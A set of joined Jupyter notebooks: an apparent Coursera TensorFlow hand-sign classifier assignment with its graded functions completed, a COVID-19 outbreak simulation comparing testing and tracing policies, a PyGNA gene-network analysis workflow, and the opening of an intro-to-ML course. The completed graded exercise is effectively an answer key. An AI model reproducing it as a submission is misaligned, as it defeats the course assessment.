forward_propagation(X, parameters): """ Implements the forward propagation for the model: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SOFTMAX Arguments: X -- input dataset placeholder, of shape (input size, number of examples) parameters -- python dictionary containing your parameters "W1", "b1", "W2", "b2", "W3", "b3" the shapes are given in initialize_parameters Returns: Z3 -- the output of the last LINEAR unit """ # Retrieve the parameters from the dictionary "parameters" W1 = parameters['W1'] b1 = parameters['b1'] W2 = parameters['W2'] b2 = parameters['b2'] W3 = parameters['W3'] b3 = parameters['b3'] ### START CODE HERE ### (approx. 5 lines) # Numpy Equivalents: Z1 = tf.add(tf.matmul(W1, X), b1) # Z1 = np.dot(W1, X) + b1 A1 = tf.nn.relu(Z1) # A1 = relu(Z1) Z2 = tf.add(tf.matmul(W2, A1), b2) # Z2 = np.dot(W2, a1) + b2 A2 = tf.nn.relu(Z2) # A2 = relu(Z2) Z3 = tf.add(tf.matmul(W3, A2), b3) # Z3 = np.dot(W3,A2) + b3 ### END CODE HERE ### return Z3 tf.reset_default_graph() with tf.Session() as sess: X, Y = create_placeholders(12288, 6) parameters = initialize_parameters() Z3 = forward_propagation(X, parameters) print("Z3 = " + str(Z3)) ###Output Z3 = Tensor("Add_2:0", shape=(6, ?), dtype=float32) ###Markdown **Expected Output**: **Z3** Tensor("Add_2:0", shape=(6, ?), dtype=float32) You may have noticed that the forward propagation doesn't output any cache. You will understand why below, when we get to backpropagation. 
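###Markdown Looking back at Section 2.2, for intuition, here is a rough numpy sketch of what Xavier initialization does under the hood (assuming the uniform variant; this is illustration only — keep the TensorFlow initializer in the graded code):

```python
import numpy as np

def xavier_uniform(fan_in, fan_out, seed=1):
    # Draw from U(-limit, limit) with limit = sqrt(6 / (fan_in + fan_out)),
    # which keeps the variance of activations roughly constant across layers.
    rng = np.random.RandomState(seed)
    limit = np.sqrt(6.0 / (fan_in + fan_out))
    return rng.uniform(-limit, limit, size=(fan_out, fan_in))

W1_np = xavier_uniform(12288, 25)  # same shape as W1 above: (25, 12288)
print(W1_np.shape, W1_np.std())
```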
2.4 Compute costAs seen before, it is very easy to compute the cost using:```pythontf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits = ...,  labels = ...))```**Question**: Implement the cost function below. - It is important to know that the "`logits`" and "`labels`" inputs of `tf.nn.softmax_cross_entropy_with_logits` are expected to be of shape (number of examples, num_classes). We have thus transposed Z3 and Y for you.- Besides, `tf.reduce_mean` basically does the summation over the examples. ###Code # GRADED FUNCTION: compute_cost def compute_cost(Z3, Y): """ Computes the cost Arguments: Z3 -- output of forward propagation (output of the last LINEAR unit), of shape (6, number of examples) Y -- "true" labels vector placeholder, same shape as Z3 Returns: cost - Tensor of the cost function """ # to fit the tensorflow requirement for tf.nn.softmax_cross_entropy_with_logits(...,...) logits = tf.transpose(Z3) labels = tf.transpose(Y) ### START CODE HERE ### (1 line of code) cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=labels)) ### END CODE HERE ### return cost tf.reset_default_graph() with tf.Session() as sess: X, Y = create_placeholders(12288, 6) parameters = initialize_parameters() Z3 = forward_propagation(X, parameters) cost = compute_cost(Z3, Y) print("cost = " + str(cost)) ###Output cost = Tensor("Mean:0", shape=(), dtype=float32) ###Markdown **Expected Output**: **cost** Tensor("Mean:0", shape=(), dtype=float32) 2.5 - Backward propagation & parameter updatesThis is where you become grateful to programming frameworks. All the backpropagation and the parameter updates are taken care of in 1 line of code. It is very easy to incorporate this line in the model.After you compute the cost function, you will create an "`optimizer`" object. You have to call this object along with the cost when running the tf.session. When called, it will perform an optimization on the given cost with the chosen method and learning rate.For instance, for gradient descent the optimizer would be:```pythonoptimizer = tf.train.GradientDescentOptimizer(learning_rate = learning_rate).minimize(cost)```To make the optimization you would do:```python_ , c = sess.run([optimizer, cost], feed_dict={X: minibatch_X, Y: minibatch_Y})```This computes the backpropagation by passing through the tensorflow graph in the reverse order, from cost to inputs.**Note** When coding, we often use `_` as a "throwaway" variable to store values that we won't need to use later. Here, `_` takes on the evaluated value of `optimizer`, which we don't need (and `c` takes the value of the `cost` variable). 2.6 - Building the modelNow, you will bring it all together! **Exercise:** Implement the model. You will be calling the functions you had previously implemented. ###Code def model(X_train, Y_train, X_test, Y_test, learning_rate = 0.0001, num_epochs = 1500, minibatch_size = 32, print_cost = True): """ Implements a three-layer tensorflow neural network: LINEAR->RELU->LINEAR->RELU->LINEAR->SOFTMAX. 
Arguments: X_train -- training set, of shape (input size = 12288, number of training examples = 1080) Y_train -- training labels, of shape (output size = 6, number of training examples = 1080) X_test -- test set, of shape (input size = 12288, number of test examples = 120) Y_test -- test labels, of shape (output size = 6, number of test examples = 120) learning_rate -- learning rate of the optimization num_epochs -- number of epochs of the optimization loop minibatch_size -- size of a minibatch print_cost -- True to print the cost every 100 epochs Returns: parameters -- parameters learnt by the model. They can then be used to predict. """ ops.reset_default_graph() # to be able to rerun the model without overwriting tf variables tf.set_random_seed(1) # to keep consistent results seed = 3 # to keep consistent results (n_x, m) = X_train.shape # (n_x: input size, m : number of examples in the train set) n_y = Y_train.shape[0] # n_y : output size costs = [] # To keep track of the cost # Create Placeholders of shape (n_x, n_y) ### START CODE HERE ### (1 line) X, Y = create_placeholders(n_x, n_y) ### END CODE HERE ### # Initialize parameters ### START CODE HERE ### (1 line) parameters = initialize_parameters() ### END CODE HERE ### # Forward propagation: Build the forward propagation in the tensorflow graph ### START CODE HERE ### (1 line) Z3 = forward_propagation(X, parameters) ### END CODE HERE ### # Cost function: Add cost function to tensorflow graph ### START CODE HERE ### (1 line) cost = compute_cost(Z3, Y) ### END CODE HERE ### # Backpropagation: Define the tensorflow optimizer. Use an AdamOptimizer. ### START CODE HERE ### (1 line) optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate, beta1=0.9, beta2=0.999, epsilon=1e-08).minimize(cost) ### END CODE HERE ### # Initialize all the variables init = tf.global_variables_initializer() # Start the session to compute the tensorflow graph with tf.Session() as sess: # Run the initialization sess.run(init) # Do the training loop for epoch in range(num_epochs): epoch_cost = 0. # Defines a cost related to an epoch num_minibatches = int(m / minibatch_size) # number of minibatches of size minibatch_size in the train set seed = seed + 1 minibatches = random_mini_batches(X_train, Y_train, minibatch_size, seed) for minibatch in minibatches: # Select a minibatch (minibatch_X, minibatch_Y) = minibatch # IMPORTANT: The line that runs the graph on a minibatch. # Run the session to execute the "optimizer" and the "cost", the feed_dict should contain a minibatch for (X,Y). 
### START CODE HERE ### (1 line) _ , minibatch_cost = sess.run([optimizer, cost], feed_dict={X: minibatch_X, Y: minibatch_Y}) ### END CODE HERE ### epoch_cost += minibatch_cost / num_minibatches # Print the cost every 100 epochs if print_cost == True and epoch % 100 == 0: print ("Cost after epoch %i: %f" % (epoch, epoch_cost)) if print_cost == True and epoch % 5 == 0: costs.append(epoch_cost) # plot the cost plt.plot(np.squeeze(costs)) plt.ylabel('cost') plt.xlabel('iterations (per tens)') plt.title("Learning rate =" + str(learning_rate)) plt.show() # lets save the parameters in a variable parameters = sess.run(parameters) print ("Parameters have been trained!") # Calculate the correct predictions correct_prediction = tf.equal(tf.argmax(Z3), tf.argmax(Y)) # Calculate accuracy on the test set accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float")) print ("Train Accuracy:", accuracy.eval({X: X_train, Y: Y_train})) print ("Test Accuracy:", accuracy.eval({X: X_test, Y: Y_test})) return parameters ###Output _____no_output_____ ###Markdown Run the following cell to train your model! On our machine it takes about 5 minutes. Your "Cost after epoch 100" should be 1.016458. If it's not, don't waste time; interrupt the training by clicking on the square (⬛) in the upper bar of the notebook, and try to correct your code. If it is the correct cost, take a break and come back in 5 minutes! ###Code parameters = model(X_train, Y_train, X_test, Y_test) ###Output Cost after epoch 0: 1.855702 Cost after epoch 100: 1.016458 Cost after epoch 200: 0.733102 Cost after epoch 300: 0.572940 Cost after epoch 400: 0.468774 Cost after epoch 500: 0.381021 Cost after epoch 600: 0.313822 Cost after epoch 700: 0.254158 Cost after epoch 800: 0.203829 Cost after epoch 900: 0.166421 Cost after epoch 1000: 0.141486 Cost after epoch 1100: 0.107580 Cost after epoch 1200: 0.086270 Cost after epoch 1300: 0.059371 Cost after epoch 1400: 0.052228 ###Markdown **Expected Output**: **Train Accuracy** 0.999074 **Test Accuracy** 0.716667 Amazing, your algorithm can recognize a sign representing a figure between 0 and 5 with 71.7% accuracy.**Insights**:- Your model seems big enough to fit the training set well. However, given the difference between train and test accuracy, you could try to add L2 or dropout regularization to reduce overfitting (a sketch follows at the end of this notebook). - Think about the session as a block of code to train the model. Each time you run the session on a minibatch, it trains the parameters. In total you have run the session a large number of times (1500 epochs) until you obtained well trained parameters. 2.7 - Test with your own image (optional / ungraded exercise)Congratulations on finishing this assignment. You can now take a picture of your hand and see the output of your model. To do that: 1. Click on "File" in the upper bar of this notebook, then click "Open" to go on your Coursera Hub. 2. Add your image to this Jupyter Notebook's directory, in the "images" folder 3. Write your image's name in the following code 4. Run the code and check if the algorithm is right! ###Code import scipy from PIL import Image from scipy import ndimage ## START CODE HERE ## (PUT YOUR IMAGE NAME) my_image = "thumbs_up.jpg" ## END CODE HERE ## # We preprocess your image to fit your algorithm. 
fname = "images/" + my_image image = np.array(ndimage.imread(fname, flatten=False)) my_image = scipy.misc.imresize(image, size=(64,64)).reshape((1, 64*64*3)).T my_image_prediction = predict(my_image, parameters) plt.imshow(image) print("Your algorithm predicts: y = " + str(np.squeeze(my_image_prediction))) ###Output Your algorithm predicts: y = 3
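###Markdown Following up on the regularization insight above, a hedged sketch of how an L2 penalty could be added to this TF1-style pipeline. The `beta` value is an arbitrary illustration, not a tuned choice, and the snippet assumes the weight tensors and the `cost` tensor from the model above are in scope:

```python
# Sketch only: add an L2 penalty on the weights to the softmax cost.
beta = 0.01  # illustrative regularization strength (would need tuning)
l2_penalty = tf.nn.l2_loss(W1) + tf.nn.l2_loss(W2) + tf.nn.l2_loss(W3)
cost = cost + beta * l2_penalty
# The optimizer definition stays the same and now also shrinks the weights:
optimizer = tf.train.AdamOptimizer(learning_rate=0.0001).minimize(cost)
```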
share/codit/notebooks/overview.ipynb
###Markdown We begin with boilerplate: ###Code %matplotlib inline import matplotlib.pyplot as plt plt.rcParams["figure.figsize"] = [12, 5] %load_ext autoreload %autoreload 2 import numpy as np import random import pandas as pd import os import sys import logging logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s', level=logging.INFO) ###Output _____no_output_____ ###Markdown Covid epidemic simulator ###Code from codit.disease import Covid from codit.outbreak import Outbreak from codit.population.networks.city import CityPopulation from codit.population.covid import PersonCovid import codit.society as society import codit.config ###Output _____no_output_____ ###Markdown Baseline config of the simulation ###Code codit.config.print_baseline_config() ###Output CROSS_IMMUNITY {'other': {'other'}, 'SARS-CoV-2': {'SARS-CoV-2', 'B.1.1.7'}, 'B.1.1.7': {'SARS-CoV-2', 'B.1.1.7'}} DAILY_TEST_CAPACITY_PER_HEAD 0.0075 DAYS_BEFORE_INFECTIOUS 4 DAYS_INFECTIOUS_TO_SYMPTOMS 2 DAYS_OF_SYMPTOMS 5 DEFAULT_COVID SARS-CoV-2 DURATION_OF_ISOLATION 10 MEAN_NETWORK_SIZE 9.0 PROB_APPLY_FOR_TEST_IF_SYMPTOMS 0.75 PROB_GET_TEST_IF_TRACED 0.75 PROB_INFECT_IF_TOGETHER_ON_A_DAY {'SARS-CoV-2': 0.025, 'B.1.1.7': 0.039} PROB_ISOLATE_IF_SYMPTOMS 0.75 PROB_ISOLATE_IF_TESTPOS 0.3 PROB_ISOLATE_IF_TRACED 0.3 PROB_NON_C19_SYMPTOMS_PER_DAY 0.01 PROB_SYMPTOMATIC 0.6 PROB_TEST_IF_REQUESTED 1 PROB_TRACING_GIVEN_CONTACT 0.6000000000000001 SIMULATOR_PERIODS_PER_DAY 1 TEST_DAYS_ELAPSED 1 VACCINATION_IMMUNITY {'AstraZeneca': {'SARS-CoV-2', 'B.1.1.7'}, 'Pfizer': {'SARS-CoV-2', 'B.1.1.7'}} _PROPORTION_OF_INFECTED_WHO_GET_TESTED 0.44999999999999996 _TARGET_R0 1.4 ###Markdown We are going to work with a city of about half a million people. ###Code pop = CityPopulation(560000, society.Society()) ###Output 2021-03-28 19:59:40,688 INFO:Building a set of 224000 households from which to build a population 2021-03-28 20:00:33,047 INFO:220051 households of mean size 2.54 2021-03-28 20:00:35,895 INFO:101252 buildings of mean size 5.53 2021-03-28 20:01:00,548 INFO:1461 classrooms of mean size 28.87 2021-03-28 20:01:00,792 INFO:99 care_homes of mean size 105.68 2021-03-28 20:01:01,845 INFO:65449 workplaces of mean size 5.62 2021-03-28 20:01:07,712 INFO:0% of workplaces closed by lockdown, leaving 54869 open, of average Income Decile 5.07 (and st dev 3.13). 2021-03-28 20:01:07,878 INFO:0% of classrooms closed by lockdown, leaving 1185 open, of average Income Decile 4.75 (and st dev 3.10). 2021-03-28 20:01:07,912 INFO:Adding 276204 permanent contact groups 2021-03-28 20:01:08,060 INFO:Adding 28000 ephemeral contact pairs 2021-03-28 20:01:08,845 INFO:Adding 168417 contacts each within one of the 101252 buildings (contact density of 0.75) ###Markdown Randomly, we put them into fixed and overlapping social groupings, where each person has a small network. 
###Code nets = [len(p.contacts) for p in pop.people] np.mean(nets) plt.hist(nets, cumulative=True, density=True, bins=2000) plt.title('Distribution of network sizes') plt.axvline(np.mean(nets), color='r') plt.grid() ###Output _____no_output_____ ###Markdown Finally ready to simulate: We will place the population that we have created into various settings and societies in the upcoming simulations. ###Code POP_SIZE = len(pop.people) PREVALENCE = 1/560 * 4 SCALE_SETTINGS = dict(n_days = 201, pop_size = POP_SIZE, seed_size = int(POP_SIZE*PREVALENCE), population=pop) SCALE_SETTINGS ###Output _____no_output_____ ###Markdown Our baseline simulation is of a runaway infection.We start with 4,000 people infected in a population of 560,000.We begin by studying a society where people don't know whether or how to self-isolate: ###Code s_basic = society.Society(config=dict(PROB_ISOLATE_IF_SYMPTOMS = 0)) o_basic = Outbreak(s_basic, Covid(), **SCALE_SETTINGS).simulate() o_basic.plot(title=str(SCALE_SETTINGS)) ###Output 2021-03-28 20:38:36,570 INFO: Realized R0 of early infections is 1.48 2021-03-28 20:38:36,570 INFO: 56.8 percent of the population was infected during the epidemic ###Markdown Let's put that on a log scale: ###Code o_basic.plot(logy=True, title='Non-isolating society: doubling time of about 15 days') ###Output 2021-03-28 20:38:40,830 INFO: Realized R0 of early infections is 1.48 2021-03-28 20:38:40,831 INFO: 56.8 percent of the population was infected during the epidemic ###Markdown Next, suppose that people know to isolate if they show symptoms, and 75% do so - this is similar to what is going on in the UK now: ###Code s_isolate = society.Society(config=dict(PROB_ISOLATE_IF_SYMPTOMS = 0.75)) o_isolate = Outbreak(s_isolate, Covid(), **SCALE_SETTINGS).simulate() o_isolate.plot(title='Isolating society: small but nasty wave') ###Output 2021-03-28 20:45:01,048 INFO: Realized R0 of early infections is 1.14 2021-03-28 20:45:01,049 INFO: 27.5 percent of the population was infected during the epidemic ###Markdown So, now we can add testing: * initially, here, let's suppose that positive test results are just ignored, while -ve results let people out of isolation: ###Code s_testignored = society.TestingSociety(config=dict(PROB_ISOLATE_IF_TESTPOS=0)) o_testignored = Outbreak(s_testignored, Covid(), **SCALE_SETTINGS).simulate() o_testignored.plot(title="Testing, but +ve results ignored: in a sense this is counterproductive \n" "(-ve result puts people back into society, and into harm's way)") ###Output 2021-03-28 20:54:03,948 INFO: Realized R0 of early infections is 1.21 2021-03-28 20:54:03,950 INFO: 31.9 percent of the population was infected during the epidemic ###Markdown * Now suppose that people respond to test results, some of the time: ###Code o_test = Outbreak(society.TestingSociety(), Covid(), **SCALE_SETTINGS).simulate() o_test.plot(title="Testing, paid attention to a bit") ###Output 2021-03-28 21:03:20,224 INFO: Realized R0 of early infections is 1.16 2021-03-28 21:03:20,225 INFO: 30.5 percent of the population was infected during the epidemic ###Markdown We add contact-tracing and isolation: ###Code o_test_trace = Outbreak(society.TestingTracingSociety(), Covid(), **SCALE_SETTINGS).simulate() o_test_trace.plot(title='Testing, tracing, and isolating', secondary_y=['prop_infected']) ###Output 2021-03-28 21:13:00,473 INFO: Realized R0 of early infections is 0.97 2021-03-28 21:13:00,474 INFO: 10.1 percent of the population was infected during the epidemic ###Markdown UK society, however, is 
characterized by testing bottlenecks: ###Code import codit.society.alternatives as alternatives o_UK = Outbreak(alternatives.UKSociety(), Covid(), **SCALE_SETTINGS).simulate() o_UK.plot(title='UK society with TTI bottlenecks - people isolate for longer') o_contact_test = Outbreak(society.ContactTestingSociety(), Covid(), **SCALE_SETTINGS).simulate() o_contact_test.plot(title="Testing, tracing&testing&isolating: " "Also testing contacts doesn't make much difference", secondary_y=['prop_infected']) census = pop.census infector_nets = [len(census[p.infectors[0]].contacts) for p in pop.people if p.infectors] infected_nets = [len(p.contacts) for p in pop.people if p.infected] def most_connected_infector(guy): if len(guy.infectors) == 0: raise NotImplementedError return max([len(i.contacts) for i in guy.chain(census) if i is not guy]) max_contacts_chain = [most_connected_infector(person) for person in pop.people if len(person.infectors)] opts = dict(cumulative=True, bins=200, density=True, histtype='step') plt.hist(nets, color='k', **opts) plt.hist(infected_nets, color='r', **opts) plt.hist(infector_nets, color='b', **opts) plt.hist(max_contacts_chain, color='g', **opts) plt.title("CDFs of valency for: people (black); infected (red); infectors (blue); max connected in chains (green)") plt.axhline(1, color='k'); plt.axvline(0, color='k') plt.grid() ###Output _____no_output_____
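###Markdown A quick aside on the doubling time quoted in one of the plot titles above: it can be estimated from a daily infection count series with a log-linear fit. A minimal sketch — the `daily_infected` array below is a hypothetical stand-in; pull the matching series out of whatever results your Outbreak object exposes:

```python
import numpy as np

# Hypothetical daily counts during the exponential growth phase.
daily_infected = np.array([4000, 4190, 4388, 4596, 4814])

# Fit log(counts) ~ slope*t + intercept; slope is the daily exponential rate.
t = np.arange(len(daily_infected))
slope, _ = np.polyfit(t, np.log(daily_infected), 1)
print("doubling time [days]:", np.log(2) / slope)  # ~15 days for this series
```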
Pathway Analysis/Case Studies/code/PyGNA workflow.ipynb
###Markdown PyGNA Workflow The workflow involves the following three steps1. Generate GMT files from CSV files in case GMT file isn't available2. Generate matrices3. Perform analysis for single or multiple genesets. Get the results in the form of pdf or png Data Loading Generating GMT files from a table This is for when you have table data from a csv or DESeq output. The following utility can be used to generate gmt files from table data. ###Code $ pygna geneset-from-table <filename>.csv <setname> <filename>.gmt --name-column <gene_names_column> --filter-column <filter-col> <'less'> --threshold <th> --descriptor <descriptor string> $ pygna geneset-from-table <deseq>.csv diff_exp <deseq>.gmt --descriptor deseq#for table from deseq ###Output _____no_output_____ ###Markdown Merging different Genesets It is also possible to merge different setnames into a single gmt file through the function generate-group-gmt. You can override the default parameters, to match the columns in your table.*generate-group-gmt* generates a GMT file of multiple setnames. From the table file, it groups the names in the group_col (the column you want to use to group them) and prints the genes in the name_col. Set the descriptor according to your needs. OR you could simply concatenate all the files. Computing rwr and sp matrices ###Code $ pygna build-distance-matrix <network> <network_sp>.hdf5 $ pygna build-rwr-diffusion <network> --output-file <network_rwr>.hdf5 ###Output _____no_output_____ ###Markdown Topology Tests ###Code $ pygna test-topology-module <network> <geneset> <table_results_test>_topology_module.csv --number-of-permutations 100 --cores 4 $ pygna test-topology-rwr <network> <geneset> <network_rwr>.hdf5 <table_results_test>_topology_rwr.csv --number-of-permutations 100 --cores 4 $ pygna test-topology-internal-degree <network> <geneset> <table_results_test>_topology_internal_degree.csv --number-of-permutations 100 --cores 4 $ pygna test-topology-sp <network> <geneset> <network_sp>.hdf5 <table_results_test>_topology_sp.csv --number-of-permutations 100 --cores 4 $ pygna test-topology-total-degree <network> <geneset> <table_results_test>_topology_total_degree.csv --number-of-permutations 100 --cores 4 ###Output _____no_output_____ ###Markdown Association tests If only A_geneset_file is passed, the analysis is run on all the pairs of sets in the file. If both A_geneset_file and B_geneset_file are passed, one can specify the setnames for both; if there is only one geneset in the file, setname_X can be omitted. If both sets are in the same file, B_geneset_file need not be specified, but setnames are needed. ###Code pygna test-association-rwr [-h] [--setname-a SETNAME_A] [--file-geneset-b FILE_GENESET_B] [--setname-b SETNAME_B] [--size-cut SIZE_CUT] [-k] [-c CORES] [-i] [--number-of-permutations NUMBER_OF_PERMUTATIONS] [--n-bins N_BINS] [--results-figure RESULTS_FIGURE] network-file file-geneset-a rwr-matrix-filename output-table Performs comparison of network location analysis. It computes a p-value for the shortest path distance between two genesets being smaller than expected by chance. If only A_geneset_file is passed the analysis is run on all the pair of sets in the file, if both A_geneset_file and B_geneset_file are passed, one can specify the setnames for both, if there is only one geneset in the file, setname_X can be omitted, if both sets are in the same file, B_geneset_file can be not specified, but setnames are needed. 
positional arguments: network-file network file file-geneset-a GMT geneset file rwr-matrix-filename .hdf5 file with the RWR matrix obtained by pygna output-table output results table, use .csv extension optional arguments: -h, --help show this help message and exit --setname-a SETNAME_A Geneset A to analyse (default: -) --file-geneset-b FILE_GENESET_B GMT geneset file (default: -) --setname-b SETNAME_B Geneset B to analyse (default: -) --size-cut SIZE_CUT removes all genesets with a mapped length < size_cut (default: 20) -k, --keep if true, keeps the geneset B unpermuted (default: False) -c CORES, --cores CORES Number of cores for the multiprocessing (default: 1) -i, --in-memory set if you want the large matrix to be read in memory (default: False) --number-of-permutations NUMBER_OF_PERMUTATIONS number of permutations for computing the empirical pvalue (default: 500) --n-bins N_BINS if >1 applies degree correction by binning the node degrees and sampling according to geneset distribution (default: 1) --results-figure RESULTS_FIGURE heatmap of results (default: -) $ pygna test-association-sp <network> <geneset> <network_sp>.hdf5 <table_results_test>_association_sp.csv -B <geneset_pathways> --keep --number-of-permutations 100 --cores 4 $ pygna test-association-rwr <network> <geneset> <network_rwr>.hdf5 <table_results_test>_association_rwr.csv -B <geneset_pathways> --keep --number-of-permutations 100 --cores 4 ###Output _____no_output_____ ###Markdown Visualisation ###Code Usage: pygna paint-datasets-stats [-h] [-a ALTERNATIVE] table-filename output-file #GNT barplot Usage: pygna paint-summary-gnt [-h] [-s SETNAME] [-t THRESHOLD] [-c COLUMN_FILTER] [--larger] [--less-tests LESS_TESTS] output-figure [input_tables [input_tables ...]]#GNT Summary Usage: pygna paint-comparison-matrix [-h] [-r] [-s] [-a] table-filename output-file#heatmap Usage: pygna paint-volcano-plot [-h] [-r] [-i ID_COL] [--threshold-x THRESHOLD_X] [--threshold-y THRESHOLD_Y] [-a] table-filename output-file#volcanoplot ###Output _____no_output_____ ###Markdown Snakemake Workflow 1) Install Snakemake2) Make changes to the config file and rules files accordingly (changing the path/parameters etc.)3) Run the analysisAll the steps from above are boiled down to one or two steps. ###Code snakemake --use-conda -n#dry run snakemake --snakefile Snakefile_paper --configfile config_paper --use-conda --cores $N#to replicate the results of the paper ###Output _____no_output_____ ###Markdown To obtain all the results for the single geneset (avoid the first step to have the full regeneration of all files): ###Code snakemake snakemake --snakefile Snakefile_paper single_all --configfile config_paper_single.yaml -t snakemake --snakefile Snakefile_paper single_all --configfile config_paper_single.yaml --use-conda ###Output _____no_output_____ ###Markdown To obtain the results for the multi geneset ###Code snakemake snakemake --snakefile Snakefile_paper multi_all --configfile config_paper_multi.yaml -t snakemake --snakefile Snakefile_paper multi_all --configfile config_paper_multi.yaml ###Output _____no_output_____ ###Markdown Paper Use Case Using Commandline Since the distance matrices are already built and the merged geneset (gmt) already obtained, topology and association analysis can be carried out directly. **Topology Analysis** ###Code #file names: biogrid_3.168_filtered.tsv merged.gmt goslim.gmt interactome_RWR.hdf5 interactome_SP.hdf5 cd /home/gee3/Documents/PyGNA/data_tcga_workflow/external/ ! 
pygna test-topology-module biogrid_3.168_filtered.tsv merged.gmt table_topology_module3.csv --number-of-permutations 100 --cores 2 ! pygna test-topology-rwr biogrid_3.168_filtered.tsv merged.gmt interactome_RWR.hdf5 tableresults_topology_rwr.csv --number-of-permutations 10 --cores 3 ! pygna test-topology-internal-degree biogrid_3.168_filtered.tsv merged.gmt table_topology_internal_degree.csv --number-of-permutations 10 --cores 3 ! pygna test-topology-sp biogrid_3.168_filtered.tsv merged.gmt interactome_SP.hdf5 table_topology_sp.csv --number-of-permutations 10 --cores 2 ! pygna test-topology-total-degree biogrid_3.168_filtered.tsv merged.gmt table_topology_total_degree.csv --number-of-permutations 100 --cores 4 ###Output _____no_output_____ ###Markdown **Association Tests** In a GNA, two genesets are tested for their association. When testing a single geneset against many pathways it is recommended that the `--keep` flag is used. This way, during resampling only geneset A is randomly permuted, while geneset B is kept as it is. This strategy is more conservative and is helpful in testing whether the tested geneset is more strongly connected to the pathway (or any other geneset of interest) than expected by chance. ###Code ! pygna test-association-rwr biogrid_3.168_filtered.tsv merged.gmt interactome_RWR.hdf5 table_association_rwr.csv --file-geneset-b goslim_entrez.gmt --keep --number-of-permutations 100 --cores 4 ###Output _____no_output_____ ###Markdown If you don't include the --results-figure flag at the comparison step, plot the matrix as follows ###Code ! pygna paint-comparison-matrix table_association_rwr.csv heatmap_association_rwr.png --rwr --annotate ###Output _____no_output_____ ###Markdown If setname B is not passed, the analysis is run between each pair of setnames in the geneset as follows (the only difference between single geneset and multiple genesets; there is no within-comparison in multi): ###Code ! pygna test-association-rwr biogrid_3.168_filtered.tsv merged.gmt interactome_RWR.hdf5 table_within_comparison_rwr.csv --number-of-permutations 100 --cores 2 ! pygna paint-comparison-matrix table_within_comparison_rwr.csv heatmap_within_comparison_rwr.png --rwr --single-geneset ! pygna test-association-sp biogrid_3.168_filtered.tsv merged.gmt interactome_SP.hdf5 table_association_SP.csv --file-geneset-b goslim_entrez.gmt --keep --number-of-permutations 2 --cores 1 ! pygna paint-comparison-matrix table_association_sp.csv heatmap_association_sp.png --rwr --annotate#default heatmap ! pygna test-association-sp biogrid_3.168_filtered.tsv merged.gmt interactome_RWR.hdf5 table_within_comparison_sp.csv --number-of-permutations 2 --cores 2 ! pygna paint-comparison-matrix table_within_comparison_sp.csv heatmap_within_comparison_rwr.png --rwr --single-geneset ###Output _____no_output_____ ###Markdown **Diagnostic** Distribution plotWhen running a statistical test, one might want to visually assess the null distribution. By passing `-d <output folder>` through the command line, a distribution plot of the empirical null is shown for each test. ###Code ! pygna test-topology-total-degree biogrid_3.168_filtered.tsv merged.gmt diagnstic_total_degree.csv -d "diagnostic/" --number-of-permutations 2 --cores 2 ###Output _____no_output_____ ###Markdown **Visualisation** There are four main types of figures currently implemented in PyGNA, namely bar plots, point plots, heatmaps and volcano plots, to visualize the GNT and GNA results.Barplots are used to plot the GNT results for a single statistic. 
The final new geneset is going to be formed by: percentage ev * HDN_total + ratio* percentage ev*vips total. ###Code !pygna hdn-add-extended input-geneset-file#Genesets are input to identify ###Output _____no_output_____ ###Markdown **Adding Partial Genesets**Creates new genesets from the vip list, number of genesets and portion of genes can be specified by input. ###Code !pygna hdn-add-partial input-geneset-file ###Output _____no_output_____ ###Markdown **Adding Branching Genesets** Creates new genesets from the vip list, new genesets are created adding 1 step nodes to vips. The new genes are created as branches. ###Code !pygna hdn-add-branching input-geneset-file ###Output _____no_output_____
part1 - intro to ML/intro_to_ML.ipynb
###Markdown Welcome to Supervised Learning Part 1: Introduction to machine learning and the bias-variance tradeoff Instructor: Andras Zsom https://github.com/azsom/Supervised-Learning The topic of the course series: supervised Machine Learning (ML)- how to build an ML pipeline from beginning to deployment- we assume you already performed data cleaning- this is the first course out of 6 courses - **Part 1: Introduction to machine learning and the bias-variance tradeoff** - Part 2: How to prepare your data for supervised machine learning - Part 3: Evaluation metrics in supervised machine learning - Part 4: SVMs, Random Forests, XGBoost - Part 5: Missing data in supervised ML - Part 6: Interpretability- you can complete the courses in sequence or complete individual courses based on your interest Tools- we use python - pros: easy to use for a beginner programmer - cons: it is very difficult to write computationally efficient code - the divide between users and developers of python packages is wide- packages we use: sklearn, pandas, numpy, matplotlib, XGBoost, SHAP- if you are a python user, you need to know exactly what you are doing - carefully read the manual, work through the examples, test every line of code you write - good test of your understanding: could I write the function/method myself if I had to? - do not assume your code works, always test everything - there are two types of errors: - one that gives an error message - usually easy to fix - the error message tells you in which line the error occurs - read and understand the error message - if it's not obvious what the error is, read more on it on stackoverflow for example - sneaky errors without an error message - these are tough! - your code runs and it gives some output but something is off - just staring at the code won't reveal the bug - print print print or use a debugger - check every line of code, trace issues through the code - to reduce the number of errors/bugs, do test-driven code development - first think about what the output of a function call/cell/piece of code should be - only then write the code - check if you got the expected output Learning objectives of this courseBy the end of the course, you will be able to- describe how a task like spam filtering can be solved with explicit coding instructions vs. 
a machine learning algorithm that learns from examples (training data),- summarize the similarities and differences between supervised and unsupervised ML,- list the pros and cons of supervised machine learning,- define the mathematical model behind linear and logistic regression,- explain what the loss function is,- describe the two main types of regularization and why it is important,- perform a simple train/validation/test split on IID data,- apply linear and logistic regression to datasets,- tune the regularization hyperparameter,- identify models with high bias and high variance,- select the best model and measure its performance on a previously unseen dataset, the test set. Module 1: Intro to Machine Learning Learning objectives of this module:- describe how a task like spam filtering can be solved with explicit coding instructions vs. 
a machine learning algorithm that learns from examples (training data),- summarize the similarities and differences between supervised and unsupervised ML,- list the pros and cons of supervised machine learning, Supervised ML- supervised ML is probably the most successful area in ML (based on economic value created) - **online advertising**: given an ad and user info, will the user click on the ad? - **real estate**: given home features, can we predict the house price? - **finance**: given an applicant and a financial product (e.g., a loan), will this applicant be able to successfully pay back the loan? - **health care**: given a patient, symptoms, and maybe test results, can we predict the illness? - ...- supervised ML pros: - **automation**: computers perform calculations faster than humans (and computers are cheaper) - **learn from examples**: no need to explicitly tell the computer what to do. The computer figures out what to do based on examples (data)- supervised ML cons: - it can be difficult or labor-intensive to collect training data - there is no guarantee that you will be able to develop an accurate model based on the data you have Example: spam filters- Traditional coding pipeline with explicit instructions Example: spam filters- ML pipeline - the data: feature matrix (X) and target variable (Y) - X can be structured 